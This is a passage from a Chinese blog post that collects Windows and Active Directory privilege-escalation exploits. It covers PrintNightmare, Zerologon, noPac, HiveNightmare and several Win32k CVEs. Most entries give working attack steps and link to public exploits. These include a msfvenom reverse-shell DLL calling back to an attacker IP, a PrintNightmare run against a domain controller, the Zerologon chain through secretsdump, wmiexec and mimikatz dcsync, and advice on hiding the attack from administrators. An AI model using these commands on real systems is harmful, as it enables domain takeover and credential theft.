Control，用户帐户控制）机制中。默认情况下，Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop。这些提示是由名为consent.exe的可执行文件产生的，该可执行文件以NT AUTHORITY\SYSTEM权限运行，完整性级别为System。因为用户可以与该UI交互，因此必须对UI进行严格限制。否则，低权限的用户可能可以通过UI操作的循环路由以SYSTEM权限执行操作。即使隔离状态的看似无害的UI特征都可能会成为引发任意控制的动作链的第一步。事实上，UAC对话框已被精简，仅包含最少的可单击选项。</span><br><span class="line"></span><br><span class="line">	影响版本</span><br><span class="line"></span><br><span class="line">		Microsoft Windows Server 2019</span><br><span class="line">Microsoft Windows Server 2016</span><br><span class="line">Microsoft Windows Server 2012</span><br><span class="line">Microsoft Windows Server 2008 R2</span><br><span class="line">Microsoft Windows Server 2008</span><br><span class="line">Microsoft Windows RT 8.1</span><br><span class="line">Microsoft Windows 8.1</span><br><span class="line">Microsoft Windows 7</span><br><span class="line"></span><br><span class="line">	修复补丁</span><br><span class="line"></span><br><span class="line">		https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388</span><br><span class="line"></span><br><span class="line">	利用</span><br><span class="line">		https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD.EXE</span><br><span class="line"></span><br><span class="line">		右键打开</span><br><span class="line">		点击颁发者链接然后关闭窗口</span><br><span class="line"></span><br><span class="line">		页面另存为</span><br><span class="line"></span><br><span class="line">		C:\Windows\System32\</span><br><span class="line">C:\Windows\System32\cmd.exe</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">CVE-2018-8639</span><br><span class="line">	描述</span><br><span class="line">	这个漏洞属于未正确处理窗口类成员对象导致的Double-free类型本地权限提升漏洞</span><br><span class="line">	影响版本</span><br><span class="line">		| Product             | Version | Update | Edition | Tested |</span><br><span class="line">| ------------------- | ------- | ------ | ------- | ------ |</span><br><span class="line">| Windows 10          | -       |        |         |        |</span><br><span class="line">| Windows 10          | 1607    |        |         |        |</span><br><span class="line">| Windows 10          | 1703    |        |         |        |</span><br><span class="line">| Windows 10          | 1709    |        |         |        |</span><br><span class="line">| Windows 10          | 1803    |        |         |        |</span><br><span class="line">| Windows 10          | 1809    |        |         |        |</span><br><span class="line">| Windows 7           | -       | SP1    |         |        |</span><br><span class="line">| Windows 8.1         | -       |        | pro N   |        |</span><br><span class="line">| Windows Rt 8.1      | -       |        |         |        |</span><br><span class="line">| Windows Server 2008 | -       | SP2    |         |        |</span><br><span class="line">| Windows Server 2008 | R2      |        | itanium |        |</span><br><span class="line">| Windows Server 2008 | R2      |        | x64     |        |</span><br><span class="line">| Windows Server 2012 | -       |        |         |        |</span><br><span class="line">| Windows Server 2012 | R2      |        |         |        |</span><br><span class="line">| Windows Server 2016 | -       |        |         |        |</span><br><span class="line">| Windows Server 2016 | 1709    |        |         |        |</span><br><span class="line">| Windows Server 2016 | 1803    |        |         |        |</span><br><span class="line">| Windows Server 2019 | -       |        |         |        |</span><br><span class="line"></span><br><span class="line">	修复</span><br><span class="line">		https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639</span><br><span class="line"></span><br><span class="line">	利用</span><br><span class="line">		https://github.com/timwhitez/CVE-2018-8639-EXP</span><br><span class="line"></span><br><span class="line">		。。。。”whoami&quot;</span><br><span class="line">CVE-2018-8453</span><br><span class="line">	 描述</span><br><span class="line">Microsoft Windows中存在提权漏洞，该漏洞源于Win32k组件没有正确的处理内存对象。本地攻击者可通过登录系统并运行特制的应用程序，利用该漏洞在内核模式下以提升的权限执行代码。</span><br><span class="line"></span><br><span class="line">	影响版本</span><br><span class="line"></span><br><span class="line">| Product             | Version | Update | Edition | Tested |</span><br><span class="line">| ------------------- | ------- | ------ | ------- | ------ |</span><br><span class="line">| Windows 10          | -       |        |         |        |</span><br><span class="line">| Windows 10          | 1607    |        |         |        |</span><br><span class="line">| Windows 10          | 1703    |        |         |        |</span><br><span class="line">| Windows 10          | 1709    |        |         | ✔️      |</span><br><span class="line">| Windows 10          | 1803    |        |         |        |</span><br><span class="line">| Windows 10          | 1809    |        |         |        |</span><br><span class="line">| Windows 7           | -       | SP1    |         |        |</span><br><span class="line">| Windows 8.1         |         |        |         |        |</span><br><span class="line">| Windows Rt 8.1      | -       |        |         |        |</span><br><span class="line">| Windows Server 2008 | -       | SP2    |         |        |</span><br><span class="line">| Windows Server 2008 | R2      | SP1    |         |        |</span><br><span class="line">| Windows Server 2012 | -       |        |         |        |</span><br><span class="line">| Windows Server 2012 | R2      |        |         |        |</span><br><span class="line">| Windows Server 2016 | -       |        |         |        |</span><br><span class="line">| Windows Server 2016 | 1709    |        |         |        |</span><br><span class="line">| Windows Server 2016 | 1803    |        |         |        |</span><br><span class="line">| Windows Server 2019 | -       |        |         |        |</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	修复补丁</span><br><span class="line">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453</span><br><span class="line"></span><br><span class="line">	利用</span><br><span class="line">		https://github.com/ze0r/cve-2018-8453-exp</span><br><span class="line"></span><br><span class="line">CVE-2018-8120</span><br><span class="line">	描述</span><br><span class="line"></span><br><span class="line">		Microsoft Windows中存在提权漏洞，该漏洞源于Win32k组件NtUserSetImeInfoEx函数内部SetImeInfoEx函数的没有正确的处理内存中的空指针对象。攻击者可利用该空指针漏洞在内核模式下以提升的权限执行任意代码。</span><br><span class="line">	影响版本</span><br><span class="line">		| Product             | Version | Update | Edition | Tested || ------------------- | ------- | ------ | ------- | ------ || Windows 7           | -       | SP1    |         | ✔️      || Windows Server 2008 | -       | SP2    |         |        || Windows Server 2008 | R2      | SP1    | itanium |        || Windows Server 2008 | R2      | SP1    | x64     | ✔️      |</span><br><span class="line"></span><br><span class="line">	修复补丁</span><br><span class="line">		https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120</span><br><span class="line"></span><br><span class="line">	利用</span><br><span class="line">		https://github.com/Ascotbe/Kernelhub/tree/master/CVE-2018-8120</span><br><span class="line"></span><br><span class="line">		https://github.com/unamer/CVE-2018-8120</span><br><span class="line"></span><br><span class="line">		。。。“whoami”</span><br><span class="line">CVE-2022-21882</span><br><span class="line">Win32k 提取，该漏洞是利用 CVE-2021-1732 漏洞（已修复）的一种延伸手段</span><br><span class="line">CVE-2021-34486</span><br><span class="line">	漏洞描述</span><br><span class="line">Windows 事件跟踪 (ETW) 机制允许记录内核或应用程序定义的事件以进行调试。 开发人员能够启动和停止事件跟踪会话，检测应用程序以提供跟踪事件，并通过调用 ETW 用户模式 Windows API 集来使用跟踪事件。 最终，这些将导致对内核 (ntoskrnl.exe) 的相应系统调用请求以执行功能。在ETW请求更新周期性捕获状态中，在特定条件下，存在一个use-after-free漏洞，攻击者可以可控地分配一个0x30字节的缓冲区，释放它，然后重用这个缓冲区来执行任意代码。</span><br><span class="line">  CVE-2021-42278 and CVE-2021-42287</span><br><span class="line">	简介</span><br><span class="line">	Windows Active Directory 域服具体利⽤流程是这样的：</span><br><span class="line">1. ⾸先创建⼀个机器账户，可以使⽤ impacket 的 addcomputer.py 或是 powermad</span><br><span class="line">addcomputer.py 是利⽤ SAMR协议 创建机器账户，这个⽅法所创建的机器账户没有SPN，所以可以不⽤清除</span><br><span class="line">2. 清除机器账户的 servicePrincipalName 属性</span><br><span class="line">3. 将机器账户的 sAMAccountName ，更改为DC的机器账户名字，注意后缀不带$</span><br><span class="line">4. 为机器账户请求TGT</span><br><span class="line">5. 将机器账户的 sAMAccountName 更改为其他名字，不与步骤3重复即可</span><br><span class="line">6. 通过S4U2self协议向DC请求ST</span><br><span class="line"></span><br><span class="line">7. 进⾏ DCsync Attack务权限提升漏洞</span><br><span class="line">	版本</span><br><span class="line">		Windows Server, version 20H2 (Server Core Installation)</span><br><span class="line">Windows Server, version 2004 (Server Core installation)</span><br><span class="line">Windows Server 2022 (Server Core installation)</span><br><span class="line">Windows Server 2022</span><br><span class="line">Windows Server 2019 (Server Core installation)</span><br><span class="line">Windows Server 2019</span><br><span class="line">Windows Server 2016 (Server Core installation)</span><br><span class="line">Windows Server 2016</span><br><span class="line">Windows Server 2012 R2 (Server Core installation)</span><br><span class="line">Windows Server 2012 R2</span><br><span class="line">Windows Server 2012 (Server Core installation)</span><br><span class="line">Windows Server 2012</span><br><span class="line">Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</span><br><span class="line">Windows Server 2008 for x64-based Systems Service Pack 2</span><br><span class="line">Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</span><br><span class="line">Windows Server 2008 for 32-bit Systems Service Pack 2</span><br><span class="line">Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</span><br><span class="line">Windows Server 2008 R2 for x64-based Systems Service Pack </span><br><span class="line"></span><br><span class="line">	https://github.com/WazeHell/sam-the-admin</span><br><span class="line"></span><br><span class="line">	python3 sam_the_admin.py &quot;god/liukaifeng01:hongrisec@2021@&quot; -dc-ip 192.168.52.138 -shell</span><br><span class="line"></span><br><span class="line">	0x02 处置建议</span><br><span class="line">目前这些漏洞已在微软11月9日发布的安全更新中修复，建议启用Windows自动更新或手动下载安装补丁。</span><br><span class="line">下载链接：</span><br><span class="line">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278</span><br><span class="line">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287</span><br><span class="line"></span><br><span class="line">CVE-2021-40449</span><br><span class="line">	描述</span><br><span class="line"></span><br><span class="line">		Win32k 特权提升漏洞</span><br><span class="line"></span><br><span class="line">	影响版本</span><br><span class="line">		Product	CPU Architecture	Version	Update	Tested</span><br><span class="line">Windows 11	x64/AMD64			✕</span><br><span class="line">Windows 10	x86/x64			</span><br><span class="line">Windows 10	x86/x64	1607		✔</span><br><span class="line">Windows 10	x86/x64/AMD64	1809		✔</span><br><span class="line">Windows 10	x86/x64/AMD64	1909		</span><br><span class="line">Windows 10	x86/x64/AMD64	2004		</span><br><span class="line">Windows 10	x86/x64/AMD64	20H2		</span><br><span class="line">Windows 10	x86/x64/AMD64	21H1		</span><br><span class="line">Windows 7	x86/x64		SP1	</span><br><span class="line">Windows 8.1	x86/x64			</span><br><span class="line">Windows Rt 8.1				</span><br><span class="line">Windows Server 2008	x86/x64		SP2	</span><br><span class="line">Windows Server 2008	x64	R2	SP1	</span><br><span class="line">Windows Server 2012				</span><br><span class="line">Windows Server 2012		R2		</span><br><span class="line">Windows Server 2016				</span><br><span class="line">Windows Server 2019				</span><br><span class="line">Windows Server 2022				</span><br><span class="line">Windows Server		2004		</span><br><span class="line">Windows Server		20H2		</span><br><span class="line"></span><br><span class="line">		https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40449</span><br><span class="line">		推荐使用CallbackHell的代码进行提权</span><br><span class="line">CVE-2021-40444漏洞复现详细</span><br><span class="line">	1、漏洞详情：</span><br><span class="line"></span><br><span class="line">		</span><br><span class="line">Microsoft MSHTML远程代码执行漏洞</span><br><span class="line">CVE-2021-40444</span><br><span class="line">严重级别：严重   CVSS：8.8</span><br><span class="line">被利用级别：检测到利用</span><br><span class="line">危害：未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。</span><br><span class="line">在野利用：微软表示已经发现攻击者利用此漏洞。在Office文档中添加恶意ActiveX控件，以此来诱导目标用户打开恶意文档。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		修复：</span><br><span class="line">截止2021年09月13号，微软暂未更新补丁，但提供了临时缓解措施：在 Internet Explorer 中禁用所有 ActiveX 控件的安装。</span><br><span class="line"></span><br><span class="line">		影响版本：</span><br><span class="line">包括Windows 7/8/8.1/10</span><br><span class="line">Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本，覆盖面比较广泛，但是主要用于office钓鱼，谨慎打开陌生文档</span><br><span class="line"></span><br><span class="line">		2、复现：</span><br><span class="line"></span><br><span class="line">			下载POC代码，到Ubuntu测试服务器上：</span><br><span class="line">https://github.com/lockedbyte/CVE-2021-40444</span><br><span class="line">(关闭防火墙，否则无法回连，ubuntu关闭防火墙    ufw disable)</span><br><span class="line">运行脚本，先安装lcab</span><br><span class="line">Sudo apt install lcab</span><br><span class="line">查看ubuntu的ip地址，等下反连回来</span><br><span class="line"></span><br><span class="line">			python3 exploit.py generate test/calc.dll http://ubuntu</span><br><span class="line"></span><br><span class="line">			sudo python3 exploit.py host 80</span><br><span class="line"></span><br><span class="line">			netstat -pantu</span><br><span class="line"></span><br><span class="line">CVE-2021-36934</span><br><span class="line">	漏洞描述</span><br><span class="line">		由于对多个系统文件（包括安全帐户管理器(SAM)数据库）的访问控制列表(ACL)过于宽松，导致存在特权提升漏洞。成功利用此漏洞的攻击者可以使用SYSTEM权限运行任意代码。然后攻击者可以安装程序；查看、更改或删除数据；或创建具有完全用户权限的新帐户。</span><br><span class="line">	漏洞影响</span><br><span class="line">		Windows 10版本1809（已测试成功）和更新的操作系统0x02漏洞利用一、通过HiveNightmare.exe导出sam hash进行提权</span><br><span class="line">	检查</span><br><span class="line"></span><br><span class="line">		Windows系统是否受漏洞影响可以以低权限用户开一个cmd输入:</span><br><span class="line">icacls C:\windows\system32\config\sam</span><br><span class="line">CVE-2021-34527</span><br><span class="line">	CVE-2021-1675</span><br><span class="line"></span><br><span class="line">	简述</span><br><span class="line">		Windows Print Spooler是Windows的打印机后台处理程序，广泛的应用于各种内网中，攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证，并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中，则攻击者可以连接到DC中的Spooler服务，并利用该漏洞在DC中安装恶意的驱动程序，完整的控制整个域环境</span><br><span class="line"></span><br><span class="line">	影响版本</span><br><span class="line"></span><br><span class="line">		* Windows Server 2019 (Server Core installation)</span><br><span class="line">  </span><br><span class="line">* Windows Server 2019</span><br><span class="line">    </span><br><span class="line">* Windows Server 2016 (Server Core installation)</span><br><span class="line">    </span><br><span class="line">* Windows Server 2016</span><br><span class="line">    </span><br><span class="line">* Windows Server 2012 R2 (Server Core installation)</span><br><span class="line">    </span><br><span class="line">* Windows Server 2012 R2</span><br><span class="line">    </span><br><span class="line">* Windows Server 2012 (Server Core installation)</span><br><span class="line">    </span><br><span class="line">* Windows Server 2012</span><br><span class="line">    </span><br><span class="line">* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</span><br><span class="line">    </span><br><span class="line">* Windows Server 2008 R2 for x64-based Systems Service Pack 1</span><br><span class="line">    </span><br><span class="line">* Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</span><br><span class="line">    </span><br><span class="line">* Windows Server 2008 for x64-based Systems Service Pack 2</span><br><span class="line">    </span><br><span class="line">* Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</span><br><span class="line">    </span><br><span class="line">* Windows Server 2008 for 32-bit Systems Service Pack 2</span><br><span class="line">    </span><br><span class="line">* Windows Server, version 2004 (Server Core installation)</span><br><span class="line">    </span><br><span class="line">* Windows RT 8.1</span><br><span class="line">    </span><br><span class="line">* Windows 8.1 for x64-based systems</span><br><span class="line">    </span><br><span class="line">* Windows 8.1 for 32-bit systems</span><br><span class="line">    </span><br><span class="line">* Windows 7 for x64-based Systems Service Pack 1</span><br><span class="line">    </span><br><span class="line">* Windows 7 for 32-bit Systems Service Pack 1</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 1607 for x64-based Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 1607 for 32-bit Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 for x64-based Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 for 32-bit Systems</span><br><span class="line">    </span><br><span class="line">* Windows Server, version 20H2 (Server Core Installation)</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 20H2 for ARM64-based Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 20H2 for 32-bit Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 20H2 for x64-based Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 2004 for x64-based Systems    </span><br><span class="line">* Windows 10 Version 2004 for ARM64-based Systems   </span><br><span class="line">* Windows 10 Version 2004 for 32-bit Systems</span><br><span class="line">* Windows 10 Version 21H1 for 32-bit Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 21H1 for ARM64-based Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 21H1 for x64-based Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 1909 for ARM64-based Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 1909 for x64-based Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 1909 for 32-bit Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 1809 for ARM64-based Systems</span><br><span class="line">    </span><br><span class="line">* Windows 10 Version 1809 for x64-based Systems</span><br><span class="line">  </span><br><span class="line">* Windows 10 Version 1809 for 32-bit Systems</span><br><span class="line">	利用</span><br><span class="line">		安装impacket</span><br><span class="line">git clone https://github.com/cube0x0/impacket</span><br><span class="line">cd impacket</span><br><span class="line">python3 ./setup.py install</span><br><span class="line"></span><br><span class="line">		下配置smb服务</span><br><span class="line">vim /etc/samba/smb.conf</span><br><span class="line">[global]</span><br><span class="line">map to guest = Bad User</span><br><span class="line">server role = standalone server</span><br><span class="line">usershare allow guests = yes</span><br><span class="line">idmap config * : backend = tdb</span><br><span class="line">smb ports = 445</span><br><span class="line">[smb]</span><br><span class="line">comment = Samba</span><br><span class="line">path = /tmp/</span><br><span class="line">guest ok = yes</span><br><span class="line">read only = no</span><br><span class="line">browsable = yes</span><br><span class="line">sudo service smbd start</span><br><span class="line"></span><br><span class="line">		生成dll和启动msf</span><br><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=4444 -f dll -o /tmp/rever.dll</span><br><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler </span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line">run</span><br><span class="line">		cd ~/</span><br><span class="line">git clone https://github.com/cube0x0/CVE-2021-1675.git</span><br><span class="line">cd CVE-2021-1675</span><br><span class="line">		sudo python3 CVE-2021-1675.py djhons.com/test:Admin@123@192.168.153.133 &apos;\\192.168.153.134\smb\rever.dll&apos;</span><br><span class="line">		坑： </span><br><span class="line">      在域控上面尝试过利用域管和本地管理员账号来利用这个漏洞，结果都不行只有普通域用户才能利用成功。如果是普通pc就没有账号的限制，但是在普通pc上利用这个漏洞的意义不大。 </span><br><span class="line">      利用成功之后sploor这个服务会自动关闭，也就是说这个漏洞只能利用成功一次。</span><br><span class="line">	修复建议</span><br><span class="line"></span><br><span class="line">		1、暂时关闭域中的 Print Spooler服务；</span><br><span class="line">2、参考微软官方通告安装补丁：</span><br><span class="line">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675</span><br><span class="line">CVE-2021-33739</span><br><span class="line">	描述</span><br><span class="line"></span><br><span class="line">		Microsoft DWM核心库的特权漏洞提升</span><br><span class="line">影响版本</span><br><span class="line">Product	CPU Architecture	Version	Update	Tested</span><br><span class="line">Windows 10	x64/x86/ARM64	1909		✔</span><br><span class="line">Windows 10	x64/x86/ARM64	2004		</span><br><span class="line">Windows 10	x64/x86/ARM64	20H2		</span><br><span class="line">Windows 10	x64/x86/ARM64	21H1		</span><br><span class="line">Windows Server		2004		</span><br><span class="line">Windows Server		20H2		</span><br><span class="line"></span><br><span class="line">	修复补丁</span><br><span class="line">		https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739</span><br><span class="line">	利用方式</span><br><span class="line"></span><br><span class="line">		编译环境</span><br><span class="line">VS2019（V142）X64 Release</span><br><span class="line">VS2019（V142）X86 Release</span><br><span class="line">测试系统Windows 10 1909 X64</span><br><span class="line">CVE-2021-1732</span><br><span class="line">	Win32k 权限提升漏洞</span><br><span class="line"></span><br><span class="line">	影响版本</span><br><span class="line"></span><br><span class="line">		Product	CPU Architecture	Version	Update	Tested</span><br><span class="line">Windows 10	x64/x86/ARM64	20H2		</span><br><span class="line">Windows 10	x64/x86/ARM64	2004		</span><br><span class="line">Windows 10	x64/x86/ARM64	1909		✔</span><br><span class="line">Windows 10	x64/x86/ARM64	1809		✔</span><br><span class="line">Windows 10	x64/x86/ARM64	1803		</span><br><span class="line">Windows 10	x64/x86/ARM64			</span><br><span class="line">Windows Server 2019				</span><br><span class="line">Windows Server		1909		</span><br><span class="line">Windows Server		2004		</span><br><span class="line">Windows Server		20H2</span><br><span class="line"></span><br><span class="line">	修复补丁</span><br><span class="line"></span><br><span class="line">		https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732</span><br><span class="line">利用方式</span><br><span class="line">CVE-2020-16938</span><br><span class="line">	描述</span><br><span class="line">Windows 内核存在信息泄露漏洞。该漏洞允许攻击者可以获取信息，从而进一步入侵用户系统。</span><br><span class="line">影响版本</span><br><span class="line">Product	Version	Update	Edition	Tested</span><br><span class="line">Windows 10	X86/x64/ARM64	2004		✔</span><br><span class="line">Windows Server		2004		</span><br><span class="line">修复补丁</span><br><span class="line">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16938</span><br><span class="line">利用方式</span><br><span class="line">编译环境</span><br><span class="line">VS2019（V142）X64 Release</span><br><span class="line">VS2019（V142）X86 Release</span><br><span class="line">测试系统Windows 10 2004 x64</span><br><span class="line">	直接利用7Z GUI的方式，即可在非管理员权限下查看config文件夹中的sam文件，而在Windows文件夹中查看会弹出UAC弹框</span><br><span class="line"></span><br><span class="line">CVE-2020-1472</span><br><span class="line">	简介</span><br><span class="line">		CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞，攻击者通过 NetLogon，建⽴与域控间易受攻击的安全通道时，可利⽤此漏洞获取域管访问权限；其漏洞原理是发⽣在 RPC 认证过程的过程中，由于错误的使</span><br><span class="line">⽤了 AES-CFB8 加密所导致漏洞成因，该漏洞适⽤于 Win2008 后的所有版本。</span><br><span class="line"></span><br><span class="line">		只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内，也不要求当前计算机操作系统为windows，</span><br><span class="line"></span><br><span class="line">		该漏洞的稳定利用方式为重置目标域控的密码， 然后利用城控凭证进行Dc sync获取域管权限后修复域控密码，之所以不直接使用坏控凭证远程执行命令，是因为城控账户是不可以登录的，但是域控具备Dc sync权限， 可以获取域内任意用户的凭证。</span><br><span class="line">		漏洞利用过程中会重置域控存储在域中(ntds.dit)的凭证，而域控存储在域中的凭证与本地的注册表/lsass中的凭证不一致时，会导致目标域控脱域，所以在重置完域控凭证后要尽快恢复。</span><br><span class="line">	漏洞利用基本思路：</span><br><span class="line"></span><br><span class="line">		使用POC检测漏洞是否存在</span><br><span class="line">利用EXP将域控密码置为空</span><br><span class="line">使用secretsdump.py获取域控hash</span><br><span class="line">通过获取到的hash使用wmiexec.py登录域控获取一个shell</span><br><span class="line">通过shell获取域控本地保存的原hash文件</span><br><span class="line">通过获取的hash文件恢复被置空的域控密码</span><br><span class="line">		python zerologon_tester.py DC 10.10.14.122</span><br><span class="line">		python cve-2020-1472-exploit.py DC 10.10.14.122</span><br><span class="line">		 python secretsdump.py douge.com/DC$@10.10.14.122 -no-pass</span><br><span class="line">		 其中通过dump的hash值，可以发现这里的域控器的DC账户密码已经被置为空密码，</span><br><span class="line"></span><br><span class="line">		攻击到这里我们可以通过爆破hash值来获取该域内所有用户的密码，如下图斗哥通过爆破administrator账户的hash获取到该账号的密码，当然实际管理员账号密码可能设置的更复杂，不一定能爆的出来。</span><br><span class="line"></span><br><span class="line">		上述步骤我们已经获取到hash，首先想到的是通过爆破hash的方式获取密码，但是不一定能爆破成功，另外由于域控制器的DC账户密码被置空导致DC脱域，为了隐蔽不让管理员发现，我们也需要将DC账号的密码hash进行恢复。因此这里我们使用wmiexec.py脚本直接使用hash值进行登录到域控，并且是一个管理员权限的shell。 </span><br><span class="line"></span><br><span class="line">		拿到shell之后就可以各种骚操作了</span><br><span class="line"></span><br><span class="line">		攻击的话基本到上步骤，但是这里我们还有没将域控的DC账号恢复成原来的hash，因此这里我们通过shell执行如下命令（使用注册表导出hash）获取域控脱域之前本地保存的hash： </span><br><span class="line"></span><br><span class="line">		reg save HKLM\SYSTEM system.save </span><br><span class="line">reg save HKLM\SAM sam.save </span><br><span class="line">reg save HKLM\SECURITY security.save </span><br><span class="line">get system.save </span><br><span class="line">get sam.save </span><br><span class="line">get security.save </span><br><span class="line">del /f system.save </span><br><span class="line">del /f sam.save </span><br><span class="line">del /f security.save</span><br><span class="line">		help lget </span><br><span class="line">		然后使用secretsdump.py脚本解析将上步骤导出的hash文件进行解析，解析结果即图中$MACHINE.ACC:plain_password_hex部分： </span><br><span class="line"></span><br><span class="line">		python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL</span><br><span class="line">		通过拿到 $MACHINE.ACC: 的值，然后进行恢复： 注意只有后半部分：python3 secretsdump.py -sam sam.save -system system.save -security</span><br><span class="line">security.save LOCAL</span><br><span class="line"></span><br><span class="line">		$MACHINE.ACC: 的值</span><br><span class="line">$MACHINE.ACC:</span><br><span class="line">aad3b435b51404eeaad3b435b51404ee:ce7b34c0f2c72d6cb03123ef5ff741ca</span><br><span class="line">		python3 reinstall_original_pw.py server2012 10.211.55.12 ce7b34c0f2c72d6cb03123ef5ff741ca</span><br><span class="line">		使用空密码再次尝试查看目标hash信息，失败，说明目标hash已成功还原。</span><br><span class="line"></span><br><span class="line">		python3 secretsdump.py  tide/server2012\$@10.211.55.12     -no-pass</span><br><span class="line">	mimikatz 利用</span><br><span class="line">		mimikatz 20200918后版本支持通过zerologon漏洞攻击域控服务器。</span><br><span class="line">		运行poc查看是否存在漏洞</span><br><span class="line">lsadump::zerologon /target:10.211.55.12 /account:server2012$</span><br><span class="line">		运行exp把域控主机hash置为空</span><br><span class="line">lsadump::zerologon /target:10.211.55.12 /account:server2012$ /exploit</span><br><span class="line">		查看指定用户的hash</span><br><span class="line"></span><br><span class="line">		lsadump::dcsync /domain:tide.org /dc:Server2012.tide.org /user:administrator /authuser:server2012$ /authdomain:tide /authpassword:&quot;&quot; /authntlm</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		防止域环境出现问题，恢复密码</span><br><span class="line">lsadump::postzerologon /target:10.211.55.12 /account:server2012$</span><br><span class="line">	补丁</span><br><span class="line">	https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472</span><br><span class="line">2022</span><br><span class="line">	1-8 CVE-2022-21999</span><br><span class="line">		Windows Print Spooler 特权提升漏洞 (LPE)</span><br><span class="line">影响版本：Windows Server, version 20H2</span><br><span class="line">Windows Server 2022Windows Server 2019 </span><br><span class="line">Windows Server 2016 Windows Server 2012</span><br><span class="line">Windows Server 2012 R2Windows Server 2008</span><br><span class="line">Windows RT 8.1Windows 8.1</span><br><span class="line">Windows 7 Windows 11</span><br><span class="line">Windows 10Windows 10 Version 21H2</span><br><span class="line">Windows 10 Version 21H1Windows 10 Version 1909</span><br><span class="line">Windows 10 Version 1809Windows 10 Version 1607</span><br><span class="line"></span><br><span class="line">		POC:https://github.com/ly4k/SpoolFool</span><br><span class="line"></span><br><span class="line">	1-9 CVE-2021-31956</span><br><span class="line">		Windows NTFS 特权提升漏洞</span><br><span class="line">影响版本：Windows Server, version 20H2</span><br><span class="line">Windows Server, version 2004Windows Server 2019</span><br><span class="line">Windows Server 2016Windows Server 2012 R2</span><br><span class="line">Windows Server 2012 Windows Server 2008 </span><br><span class="line">Windows Server 2008 R2Windows RT 8.1</span><br><span class="line">Windows 8.1Windows 7</span><br><span class="line">Windows 10Windows 10 Version 21H1</span><br><span class="line">Windows 10 Version 20H2Windows 10 Version 2004</span><br><span class="line">Windows 10 Version 1909Windows 10 Version 1809</span><br><span class="line">Windows 10 Version 1607POC:</span><br><span class="line">https://github.com/aazhuliang/CVE-2021-31956-EXP</span><br><span class="line">	1-10 CVE-2022-41379</span><br><span class="line">		Windows Installer 特权提升漏洞影响版本：Windows Server, version 20H2</span><br><span class="line">Windows Server, version 2004 Windows Server 2022 Windows Server 2019Windows Server 2016 </span><br><span class="line">Windows Server 2012 R2 Windows Server 2012 Windows Server 2008 Windows Server 2008</span><br><span class="line">Windows RT 8.1Windows 8.1Windows 7 Windows 11 for x64</span><br><span class="line">Windows 11 for ARM64Windows 10 Windows 10 Version 21H1Windows 10 Version 20H2 </span><br><span class="line">Windows 10 Version 2004Windows 10 Version 1909 Windows 10 Version 1809 Windows 10 Version 1607</span><br><span class="line">POC:https://github.com/klinix5/InstallerFileTakeOver</span><br><span class="line">	2022-26923</span><br></pre></td></tr></table></figure>
  </article>
  <aside class="table-content" id="site-toc">
  <div class="table-content-title">
    <i class="fa fa-arrow-right fa-lg" id="site-toc-hide-btn"></i>
    <span>目录</span>
  </div>
  <div class="table-content-main">
    
  </div>
</aside>
  
    <aside class="passage-copyright">
      <div>本文作者: hcncn</div>
      
        <div>
          原文链接: 
          <a href="" target="_blank">https://hcncn6.github.io/2022/09/05/内网/内网提权合集/</a>
        </div>
      
      <div>
        版权声明: 本博客所有文章除特别声明外, 均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议. 转载请注明出处!
      </div>
    </aside>
  
  
</div>

    </main>
    
    <div class="site-footer-wrapper">
  <footer class="site-footer">
    
    <div class="site-footer-info">
      <i class="fa fa-clock-o"></i> 本站已稳定运行<span id="site-time"></span>
    </div>
    
      <div class="site-footer-info">
        <i class="fa fa-paw"></i> 您是本站第 <span id="site-count"></span> 位访客
